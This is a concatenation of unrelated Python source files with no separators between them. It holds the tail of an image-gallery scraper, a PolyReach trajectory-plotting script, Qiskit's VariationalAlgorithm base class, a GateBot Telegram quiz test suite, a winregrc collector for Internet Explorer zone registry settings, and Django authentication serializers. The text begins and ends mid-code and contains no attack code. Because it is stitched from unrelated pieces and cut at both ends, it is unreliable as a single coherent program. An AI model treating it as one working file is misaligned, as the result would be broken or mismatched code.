strippedurl.split('=', 1)[1] path = foldername + '/' print('#checking for path ' + path) if not os.path.exists(path): os.makedirs(path) else: print('#path already exists') replay() return None print('#proceding..') session = dryscrape.Session() session.visit(strippedurl) response = session.body() soup = BeautifulSoup(response) while page <= mp: print('#getting galthumb') try: for galthumb in soup.findAll('div', {'class':'gallerythumbbox'}): print('#getting imghref') for img in galthumb.findAll('a'): imghref = img.get('href') get_imgs(imghref, path) except: print('##error') page += 1 def get_imgs(url, path, mp = 1): imghref = url page = 1 print('#loading img page..') session = dryscrape.Session() session.visit(imghref) response = session.body() soup = BeautifulSoup(response) time.sleep(5) while page <= mp: print('#getting imglink') failcount = 0 try: for imglink in soup.findAll('img', {'id': 'thepic'}): print('#downloading img..') root = imghref.split('img.php?', 1)[0] name = str(imglink.get('alt')) splitname = name.split('/', 2)[2] pathname = path + splitname src = root + imglink.get('src') t = time.time() urllib.request.urlretrieve(src, pathname) t2 = str(time.time() - t) t3 = t2[:4] print('#downloaded ' + splitname) print('#in ' + t3 + ' seconds') print('#waiting..') except: failcount += 1 print('#failed: total ' + str(failcount)) page +=1 sign() crawl() TimSweering/PolyReach #!/usr/bin/env python from scripts.ReachabilityAlgorithm import PolyReach from matplotlib import pyplot as plt import sys PolyReach.plot_trajectory_from_file(sys.argv[1]) plt.show()# This code is part of Qiskit. # # (C) Copyright IBM 2019, 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """The Variational Algorithm Base Class. This class can be used an interface for working with Variation Algorithms, such as VQE, QAOA, or QSVM, and also provides helper utilities for implementing new variational algorithms. Writing a new variational algorithm is a simple as extending this class, implementing a cost function for the new algorithm to pass to the optimizer, and running :meth:`find_minimum` method of this class to carry out the optimization. Alternatively, all of the functions below can be overridden to opt-out of this infrastructure but still meet the interface requirements. .. note:: This component has some function that is normally random. If you want to reproduce behavior then you should set the random number generator seed in the algorithm_globals (``qiskit.utils.algorithm_globals.random_seed = seed``). """ from typing import Optional, Callable, Union, Dict import time import logging from abc import abstractmethod import numpy as np from qiskit.circuit import QuantumCircuit from qiskit.providers import BaseBackend from qiskit.providers import Backend from qiskit.opflow.gradients import GradientBase from qiskit.utils import QuantumInstance, algorithm_globals from .algorithm_result import AlgorithmResult from .optimizers import Optimizer, SLSQP logger = logging.getLogger(__name__) class VariationalAlgorithm: """The Variational Algorithm Base Class.""" def __init__( self, ansatz: QuantumCircuit, optimizer: Optimizer, cost_fn: Optional[Callable] = None, gradient: Optional[Union[GradientBase, Callable]] = None, initial_point: Optional[np.ndarray] = None, quantum_instance: Optional[Union[QuantumInstance, BaseBackend, Backend]] = None, ) -> None: """ Args: ansatz: An optional parameterized ansatz (a.k.a. variational form). optimizer: A classical optimizer. cost_fn: An optional cost function for optimizer. If not supplied here must be supplied on :meth:`find_minimum`. gradient: An optional gradient operator or function for optimizer. initial_point: An optional initial point (i.e. initial parameter values) for the optimizer. quantum_instance: Quantum Instance or Backend Raises: ValueError: for invalid input """ self._quantum_instance = None if quantum_instance: self.quantum_instance = quantum_instance if optimizer is None: logger.info("No optimizer provided, setting it to SLSPQ.") optimizer = SLSQP() self._optimizer = optimizer self._gradient = gradient self._cost_fn = cost_fn self._initial_point = initial_point self._ansatz = ansatz self._ansatz_params = None if ansatz is not None: self.ansatz = ansatz self._parameterized_circuits = None @property def quantum_instance(self) -> Optional[QuantumInstance]: """Returns quantum instance.""" return self._quantum_instance @quantum_instance.setter def quantum_instance( self, quantum_instance: Union[QuantumInstance, BaseBackend, Backend] ) -> None: """Sets quantum instance.""" if isinstance(quantum_instance, (BaseBackend, Backend)): quantum_instance = QuantumInstance(quantum_instance) self._quantum_instance = quantum_instance @property def ansatz(self) -> Optional[QuantumCircuit]: """Returns the ansatz""" return self._ansatz @ansatz.setter def ansatz(self, ansatz: Optional[QuantumCircuit]): """Sets the ansatz""" if isinstance(ansatz, QuantumCircuit): # store the parameters self._ansatz_params = sorted(ansatz.parameters, key=lambda p: p.name) self._ansatz = ansatz elif ansatz is None: self._ansatz_params = None self._ansatz = ansatz else: raise ValueError('Unsupported type "{}" of ansatz'.format(type(ansatz))) @property def optimizer(self) -> Optional[Optimizer]: """Returns optimizer""" return self._optimizer @optimizer.setter def optimizer(self, optimizer: Optimizer): """Sets optimizer""" self._optimizer = optimizer @property def initial_point(self) -> Optional[np.ndarray]: """Returns initial point""" return self._initial_point @initial_point.setter def initial_point(self, initial_point: np.ndarray): """Sets initial point""" self._initial_point = initial_point def find_minimum( self, initial_point: Optional[np.ndarray] = None, ansatz: Optional[QuantumCircuit] = None, cost_fn: Optional[Callable] = None, optimizer: Optional[Optimizer] = None, gradient_fn: Optional[Callable] = None, ) -> "VariationalResult": """Optimize to find the minimum cost value. Args: initial_point: If not `None` will be used instead of any initial point supplied via constructor. If `None` and `None` was supplied to constructor then a random point will be used if the optimizer requires an initial point. ansatz: If not `None` will be used instead of any ansatz supplied via constructor. cost_fn: If not `None` will be used instead of any cost_fn supplied via constructor. optimizer: If not `None` will be used instead of any optimizer supplied via constructor. gradient_fn: Optional gradient function for optimizer Returns: dict: Optimized variational parameters, and corresponding minimum cost value. Raises: ValueError: invalid input """ initial_point = initial_point if initial_point is not None else self.initial_point ansatz = ansatz if ansatz is not None else self.ansatz cost_fn = cost_fn if cost_fn is not None else self._cost_fn optimizer = optimizer if optimizer is not None else self.optimizer if ansatz is None: raise ValueError("Ansatz neither supplied to constructor nor find minimum.") if cost_fn is None: raise ValueError("Cost function neither supplied to constructor nor find minimum.") if optimizer is None: raise ValueError("Optimizer neither supplied to constructor nor find minimum.") nparms = ansatz.num_parameters if hasattr(ansatz, "parameter_bounds") and ansatz.parameter_bounds is not None: bounds = ansatz.parameter_bounds else: bounds = [(None, None)] * nparms if initial_point is not None and len(initial_point) != nparms: raise ValueError( "Initial point size {} and parameter size {} mismatch".format( len(initial_point), nparms ) ) if len(bounds) != nparms: raise ValueError("Ansatz bounds size does not match parameter size") # If *any* value is *equal* in bounds array to None then the problem does *not* have bounds problem_has_bounds = not np.any(np.equal(bounds, None)) # Check capabilities of the optimizer if problem_has_bounds: if not optimizer.is_bounds_supported: raise ValueError("Problem has bounds but optimizer does not support bounds") else: if optimizer.is_bounds_required: raise ValueError("Problem does not have bounds but optimizer requires bounds") if initial_point is not None: if not optimizer.is_initial_point_supported: raise ValueError("Optimizer does not support initial point") else: if optimizer.is_initial_point_required: if hasattr(ansatz, "preferred_init_points"): # Note: default implementation returns None, hence check again after below initial_point = ansatz.preferred_init_points if initial_point is None: # If still None use a random generated point low = [(l if l is not None else -2 * np.pi) for (l, u) in bounds] high = [(u if u is not None else 2 * np.pi) for (l, u) in bounds] initial_point = algorithm_globals.random.uniform(low, high) start = time.time() if not optimizer.is_gradient_supported: # ignore the passed gradient function gradient_fn = None else: if not gradient_fn: gradient_fn = self._gradient logger.info("Starting optimizer.\nbounds=%s\ninitial point=%s", bounds, initial_point) opt_params, opt_val, num_optimizer_evals = optimizer.optimize( nparms, cost_fn, variable_bounds=bounds, initial_point=initial_point, gradient_function=gradient_fn, ) eval_time = time.time() - start result = VariationalResult() result.optimizer_evals = num_optimizer_evals result.optimizer_time = eval_time result.optimal_value = opt_val result.optimal_point = opt_params result.optimal_parameters = dict(zip(self._ansatz_params, opt_params)) return result def get_prob_vector_for_params( self, construct_circuit_fn, params_s, quantum_instance, construct_circuit_args=None ): """Helper function to get probability vectors for a set of params""" circuits = [] for params in params_s: circuit = construct_circuit_fn(params, **construct_circuit_args) circuits.append(circuit) results = quantum_instance.execute(circuits) probs_s = [] for circuit in circuits: if quantum_instance.is_statevector: sv = results.get_statevector(circuit) probs = np.real(sv * np.conj(sv)) probs_s.append(probs) else: counts = results.get_counts(circuit) probs_s.append(self.get_probabilities_for_counts(counts)) return np.array(probs_s) def get_probabilities_for_counts(self, counts): """get probabilities for counts""" shots = sum(counts.values()) states = int(2 ** len(list(counts.keys())[0])) probs = np.zeros(states) for k, v in counts.items(): probs[int(k, 2)] = v / shots return probs @abstractmethod def get_optimal_cost(self): """get optimal cost""" raise NotImplementedError() @abstractmethod def get_optimal_circuit(self): """get optimal circuit""" raise NotImplementedError() @abstractmethod def get_optimal_vector(self): """get optimal vector""" raise NotImplementedError() @property @abstractmethod def optimal_params(self): """returns optimal parameters""" raise NotImplementedError() def cleanup_parameterized_circuits(self): """set parameterized circuits to None""" self._parameterized_circuits = None class VariationalResult(AlgorithmResult): """Variation Algorithm Result.""" def __init__(self) -> None: super().__init__() self._optimizer_evals = None self._optimizer_time = None self._optimal_value = None self._optimal_point = None self._optimal_parameters = None @property def optimizer_evals(self) -> Optional[int]: """Returns number of optimizer evaluations""" return self._optimizer_evals @optimizer_evals.setter def optimizer_evals(self, value: int) -> None: """Sets number of optimizer evaluations""" self._optimizer_evals = value @property def optimizer_time(self) -> Optional[float]: """Returns time taken for optimization""" return self._optimizer_time @optimizer_time.setter def optimizer_time(self, value: float) -> None: """Sets time taken for optimization""" self._optimizer_time = value @property def optimal_value(self) -> Optional[float]: """Returns optimal value""" return self._optimal_value @optimal_value.setter def optimal_value(self, value: int) -> None: """Sets optimal value""" self._optimal_value = value @property def optimal_point(self) -> Optional[np.ndarray]: """Returns optimal point""" return self._optimal_point @optimal_point.setter def optimal_point(self, value: np.ndarray) -> None: """Sets optimal point""" self._optimal_point = value @property def optimal_parameters(self) -> Optional[Dict]: """Returns the optimal parameters in a dictionary""" return self._optimal_parameters @optimal_parameters.setter def optimal_parameters(self, value: Dict) -> None: """Sets optimal parameters""" self._optimal_parameters = value from datetime import timedelta from gatebot.bot import GateBot from gatebot.questions import Question from .utils import UserSession QUESTION_1 = Question( text="Test question #1", options=[ "Test option 1.1", "Test option 1.2", "Test option 1.3", ], answer=0, ) QUESTION_2 = Question( text="Test question #2", options=[ "Test option 2.1", "Test option 2.2", "Test option 2.3", "Test option 2.4", ], answer=3, ) QUESTION_3 = Question( text="Test question #3", options=[ "Test option 3.1", "Test option 3.2", "Test option 3.3", "Test option 3.4", "Test option 3.5", ], answer=1, ) def test_user_joins(gatebot: GateBot): session = UserSession(gatebot) session.play_joins_group() session.assert_was_restricted() def test_user_sends_start(gatebot: GateBot): session = UserSession(gatebot) session.play_sends_command("start") session.assert_sent_getting_started() def test_user_sends_start_in_group(gatebot: GateBot): session = UserSession(gatebot) session.play_sends_command_group("start") session.assert_no_api_calls() def test_user_starts_quiz(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) def test_user_starts_quiz_twice(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "answer_0") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='correct') # Quiz is not recreated session.play_sends_callback_query(2, "start_quiz") session.assert_question_displayed( 2, QUESTION_1, pos=1, answered='correct') def test_navigation(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_2, pos=2) session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_3, pos=3) session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "prev") session.assert_question_displayed(1, QUESTION_3, pos=3) session.play_sends_callback_query(1, "prev") session.assert_question_displayed(1, QUESTION_2, pos=2) def test_answering_questions(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "answer_0") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='correct') session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_2, pos=2) session.play_sends_callback_query(1, "answer_2") session.assert_question_displayed( 1, QUESTION_2, pos=2, answered='wrong') session.play_sends_callback_query(1, "prev") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='correct') def test_no_changing_answer(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "answer_1") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='wrong') session.play_sends_callback_query(1, "answer_0") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='wrong') def test_joins_and_passes(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_joins_group() session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.assert_sent_passed(result=2) session.assert_was_unrestricted() def test_passes_and_shares_result(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_joins_group() session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.assert_sent_passed(result=2) session.play_sends_callback_query(2, "share_result") session.assert_sent_results(result=2) # Can't share the result multiple times session.play_sends_callback_query(2, "share_result") session.assert_no_messages_sent() def test_passes_and_joins(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_1") # Correct session.assert_sent_passed(result=3) session.assert_was_unrestricted() session.play_joins_group() session.assert_no_restriction_api_calls() def test_starts_quiz_and_joins(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_joins_group() session.assert_was_restricted() def test_fails(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_1") # Correct session.assert_sent_failed(result=1) session.assert_no_restriction_api_calls() def test_passes_and_sends_start(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) # Pass the test session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_1") # Correct session.play_sends_command("start") session.assert_sent_passed(result=3) def test_fails_and_sends_start(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) # Pass the test session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_command("start") session.assert_sent_failed(result=0) def test_fails_and_restarts(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.force_questions = [ QUESTION_3, QUESTION_2, QUESTION_1, ] session.play_time_passed(timedelta(hours=73)) session.play_sends_command("start") session.assert_sent_getting_started() session.play_sends_callback_query(2, "start_quiz") session.assert_question_displayed( 2, QUESTION_3, pos=1) def test_fails_and_restarts_too_soon(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") # Let some time pass before the last answer to make sure user waits # after the last answer not after the quiz was started. session.play_time_passed(timedelta(hours=30)) session.play_sends_callback_query(1, "answer_2") # Wrong session.play_time_passed(timedelta(hours=70)) session.play_sends_command("start") session.assert_sent_failed(result=0, wait_hours=2) # -*- coding: utf-8 -*- """Microsoft Internet Explorer (MSIE) zone information collector.""" from __future__ import print_function from __future__ import unicode_literals from winregrc import interface DEFAULT_ZONE_NAMES = { '0': 'My Computer', '1': 'Local Intranet Zone', '2': 'Trusted sites Zone', '3': 'Internet Zone', '4': 'Restricted Sites Zone', } # Sources: # http://support.microsoft.com/kb/182569 # http://technet.microsoft.com/en-us/library/cc783259(v=ws.10).aspx CONTROL_DESCRIPTIONS = { '1001': 'Download signed ActiveX controls', '1004': 'Download unsigned ActiveX controls', '1200': 'Run ActiveX controls and plug-ins', '1201': ('Initialize and script ActiveX controls not marked as safe for ' 'scripting'), '1206': 'Allow scripting of Internet Explorer Web browser control', '1207': 'Reserved', '1208': 'Allow previously unused ActiveX controls to run without prompt', '1209': 'Allow Scriptlets', '120A': 'Override Per-Site (domain-based) ActiveX restrictions', '120B': 'Override Per-Site (domain-based) ActiveX restrictions', '1400': 'Active scripting', '1402': 'Scripting of Java applets', '1405': 'Script ActiveX controls marked as safe for scripting', '1406': 'Access data sources across domains', '1407': 'Allow Programmatic clipboard access', '1408': 'Reserved', '1601': 'Submit non-encrypted form data', '1604': 'Font download', '1605': 'Run Java', '1606': 'Userdata persistence', '1607': 'Navigate sub-frames across different domains', '1608': 'Allow META REFRESH', '1609': 'Display mixed content', '160A': 'Include local directory path when uploading files to a server', '1800': 'Installation of desktop items', '1802': 'Drag and drop or copy and paste files', '1803': 'File Download', '1804': 'Launching programs and files in an IFRAME', '1805': 'Launching programs and files in webview', '1806': 'Launching applications and unsafe files', '1807': 'Reserved', '1808': 'Reserved', '1809': 'Use Pop-up Blocker', '180A': 'Reserved', '180B': 'Reserved', '180C': 'Reserved', '180D': 'Reserved', '1A00': 'Logon', '1A02': 'Allow persistent cookies that are stored on your computer', '1A03': 'Allow per-session cookies (not stored)', '1A04': ('Don\'t prompt for client certificate selection when no ' 'certificates or only one certificate exists'), '1A05': 'Allow 3rd party persistent cookies', '1A06': 'Allow 3rd party session cookies', '1A10': 'Privacy Settings', '1C00': 'Java permissions', '1E05': 'Software channel permissions', '1F00': 'Reserved', '2000': 'Binary and script behaviors', '2001': 'Run components signed with Authenticode', '2004': 'Run components not signed with Authenticode', '2100': 'Open files based on content, not file extension', '2101': ('Web sites in less privileged web content zone can navigate into ' 'this zone'), '2102': ('Allow script initiated windows without size or position ' 'constraints'), '2103': 'Allow status bar updates via script', '2104': 'Allow websites to open windows without address or status bars', '2105': 'Allow websites to prompt for information using scripted windows', '2200': 'Automatic prompting for file downloads', '2201': 'Automatic prompting for ActiveX controls', '2300': 'Allow web pages to use restricted protocols for active content', '2301': 'Use Phishing Filter', '2400': '.NET Framework: XAML browser applications', '2401': '.NET Framework: XPS documents', '2402': '.NET Framework: Loose XAML', '2500': 'Turn on Protected Mode [Vista only setting]', '2600': 'Enable .NET Framework setup', } CONTROL_VALUES_COMMON_ENABLE = { 0x00000000: 'Enable', 0x00000001: 'Prompt', 0x00000003: 'Disable', 0x00010000: 'Administrator approved', } CONTROL_VALUES_COMMON_SAFETY = { 0x00010000: 'High safety', 0x00020000: 'Medium safety', 0x00030000: 'Low safety', } CONTROL_VALUES_1A00 = { 0x00000000: 'Automatic logon with current user name and password', 0x00010000: 'Prompt for user name and password', 0x00020000: 'Automatic logon only in Intranet zone', 0x00030000: 'Anonymous logon', } CONTROL_VALUES_1C00 = { 0x00000000: 'Disable Java', 0x00010000: 'High safety', 0x00020000: 'Medium safety', 0x00030000: 'Low safety', 0x00800000: 'Custom', } class MSIEZoneInfoCollector(interface.WindowsRegistryKeyCollector): """MSIE zone information collector.""" def _PrintLockdownKey(self, registry, lockdown_key_path): """Prints a lockdown key. Args: registry (dfwinreg.WinRegistry): Windows Registry. lockdown_key_path (str): lockdown Registry key path. """ lockdown_key = registry.GetKeyByPath(lockdown_key_path) if not lockdown_key: return if self._debug: print('Key: {0:s}'.format(lockdown_key_path)) print('') program_name = 'iexplore.exe' program_value = lockdown_key.GetValueByName(program_name) if program_value: value = program_value.GetDataAsObject() else: value = 0 if self._debug: if value == 1: print('Local Machine lockdown for {0:s}: True'.format(program_name)) else: print('Local Machine lockdown for {0:s}: False'.format(program_name)) print('') def _PrintZonesKey(self, registry, zones_key_path, output_mode=0): """Prints a zones key. Args: registry (dfwinreg.WinRegistry): Windows Registry. zones_key_path (str): zones Registry key path. output_mode (Optional[int]): output mode. """ zones_key = registry.GetKeyByPath(zones_key_path) if not zones_key: return if self._debug: print('Key: {0:s}'.format(zones_key_path)) print('') for zone_key in zones_key.GetSubkeys(): # TODO: the zone names are defined in another key. if zone_key.name in DEFAULT_ZONE_NAMES: if self._debug: print('Zone: {0:s}: {1:s}'.format( zone_key.name, DEFAULT_ZONE_NAMES[zone_key.name])) else: if self._debug: print('Zone: {0:s}'.format(zone_key.name)) for setting_value in zone_key.GetValues(): if not setting_value.name: continue elif setting_value.name in [ 'Description', 'DisplayName', 'PMDisplayName']: if output_mode == 0: if self._debug: print('{0:s}: {1:s}'.format( setting_value.name, setting_value.GetDataAsObject())) elif len(setting_value.name) == 4 and setting_value.name != 'Icon': if len(setting_value.data) != 4: if output_mode == 0: if self._debug: print('Value: {0:s}'.format(setting_value.data.encode('hex'))) else: value = setting_value.GetDataAsObject() value_desc = '' if setting_value.name in [ '1001', '1004', '1200', '1201', '1400', '1402', '1405', '1406', '1407', '1601', '1604', '1606', '1607', '1608', '1609', '1800', '1802', '1803', '1804', '1809', '1A04', '2000', '2001', '2004', '2100', '2101', '2102', '2200', '2201', '2300']: value_desc = CONTROL_VALUES_COMMON_ENABLE.get(value, '') elif setting_value.name == '1A00': value_desc = CONTROL_VALUES_1A00.get(value, '') elif setting_value.name == '1C00': value_desc = CONTROL_VALUES_1C00.get(value, '') elif setting_value.name == '1E05': value_desc = CONTROL_VALUES_COMMON_SAFETY.get(value, '') if output_mode == 0: if setting_value.name in CONTROL_DESCRIPTIONS: if self._debug: print('Control: {0:s}: {1:s}'.format( setting_value.name, CONTROL_DESCRIPTIONS[setting_value.name])) else: if self._debug: print('Control: {0:s}'.format(setting_value.name)) if value_desc: if self._debug: print('Data: 0x{0:08x}: {1:s}'.format(value, value_desc)) else: if self._debug: print('Data: 0x{0:08x}'.format(value)) elif output_mode == 1: if setting_value.name in CONTROL_DESCRIPTIONS: control_desc = CONTROL_DESCRIPTIONS[setting_value.name] else: control_desc = '' if self._debug: print('{0:s}\t0x{1:08x}\t{2:s}\t{3:s}'.format( setting_value.name, value, value_desc, control_desc)) else: if output_mode == 0: if self._debug: print('Value: {0:s}'.format(setting_value.name)) if self._debug: print('') def Collect(self, registry, output_writer): """Collects the MSIE zone information. Args: registry (dfwinreg.WinRegistry): Windows Registry. output_writer (OutputWriter): output writer. Returns: bool: True if the MSIE zone information key was found, False if not. """ result = False output_mode = 1 # TODO: pass output_writer _ = output_writer # HKEY_CURRENT_USER key_path = ( 'HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\' 'Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) key_path = ( 'HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\' 'FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) # HKEY_LOCAL_MACHINE key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\' 'Internet Explorer\\Main\\FeatureControl\\' 'FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\' 'FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) # HKEY_LOCAL_MACHINE WoW64 key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Policies\\Microsoft\\' 'Internet Explorer\\Main\\FeatureControl\\' 'FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\' 'Internet Explorer\\Main\\FeatureControl\\' 'FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) # TODO: check for value Policies\\Microsoft\\Windows\\CurrentVersion\\ # Internet Settings\\Security_HKEY_LOCAL_MACHINE_only and its data # if not exists or 0, not enabled if 1 only HKLM policy applies # HKEY_CURRENT_USER key_path = ( 'HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) # HKEY_LOCAL_MACHINE key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) # HKEY_LOCAL_MACHINE WoW64 key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Policies\\Microsoft\\' 'Windows\\CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Policies\\Microsoft\\' 'Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) return result api/authentication/serializers.py from django.contrib.auth.password_validation import validate_password from rest_framework import serializers from django.contrib.auth import get_user_model from django.db.models import Q from rest_framework.response import Response from authentication.models import (Student, Teacher, Faculty, Profession, ACAD_GROUPS_CHOICES) User = get_user_model() class FacultySerializer(serializers.ModelSerializer): class Meta(object): model = Faculty fields = ('name',) class ProfessionSerializer(serializers.ModelSerializer): class Meta(object): model = Profession fields = ('name',) class CreateUserSerializer(serializers.ModelSerializer): read_only_fields = ('date_joined',) class Meta(object): model = User fields = ( 'email', 'password', ) def create(self, validated_data): validate_password(password=validated_data.get('password',), user=validated_data.get('email'), password_validators=None) email = validated_data.get('email'); user = User.objects.create_user(**validated_data, user_type=3) user.send_mail(email=email) return user class RecoverySerializer(serializers.ModelSerializer): email = serializers.CharField(max_length=64) class Meta(object): model = User fields = ('email',) def post(self, data): email = data.get('email', None) user = User.objects.filter(Q(email=email)).distinct() if user.exists() and user.count() == 1: user_obj = user.first() user_obj.send_recovery_password(email=email) else: raise serializers.ValidationError("This email is not valid") if user_obj: if not user_obj.is_active: raise serializers.ValidationError("User not active") return data class VerifyUserSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ('code',) class VerifyUserPassSerializer(serializers.ModelSerializer): password = serializers.CharField(max_length=64) class Meta(object): model = User fields = ('code', 'password',) def post(self, data, code): user = 